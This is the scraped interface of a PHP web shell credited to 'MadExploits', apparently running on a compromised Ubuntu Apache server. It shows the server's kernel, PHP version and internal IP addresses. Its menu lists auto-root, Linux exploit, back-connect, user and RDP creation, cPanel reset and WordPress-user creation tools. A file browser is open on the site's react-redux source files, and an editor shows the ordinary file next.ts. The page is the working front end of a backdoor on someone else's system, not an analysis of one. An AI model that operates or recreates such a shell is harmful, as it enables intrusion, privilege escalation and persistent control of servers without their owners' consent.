Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
react-redux /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
components
[ DIR ]
drwxrwxr-x
connect
[ DIR ]
drwxrwxr-x
hooks
[ DIR ]
drwxrwxr-x
utils
[ DIR ]
drwxrwxr-x
alternate-renderers.ts
917
B
-rw-rw-r--
exports.ts
1.57
KB
-rw-rw-r--
index.ts
927
B
-rw-rw-r--
next.ts
968
B
-rw-rw-r--
types.ts
5.77
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : next.ts
// The secondary entry point assumes we are working with React 18, and thus have // useSyncExternalStore available. We can import that directly from React itself. // The useSyncExternalStoreWithSelector has to be imported, but we can use the // non-shim version. This shaves off the byte size of the shim. import * as React from 'react' import { useSyncExternalStoreWithSelector } from 'use-sync-external-store/with-selector' import { unstable_batchedUpdates as batch } from './utils/reactBatchedUpdates' import { setBatch } from './utils/batch' import { initializeUseSelector } from './hooks/useSelector' import { initializeConnect } from './components/connect' initializeUseSelector(useSyncExternalStoreWithSelector) initializeConnect(React.useSyncExternalStore) // Enable batched updates in our subscriptions for use // with standard React renderers (ReactDOM, React Native) setBatch(batch) export { batch } export * from './exports'
Close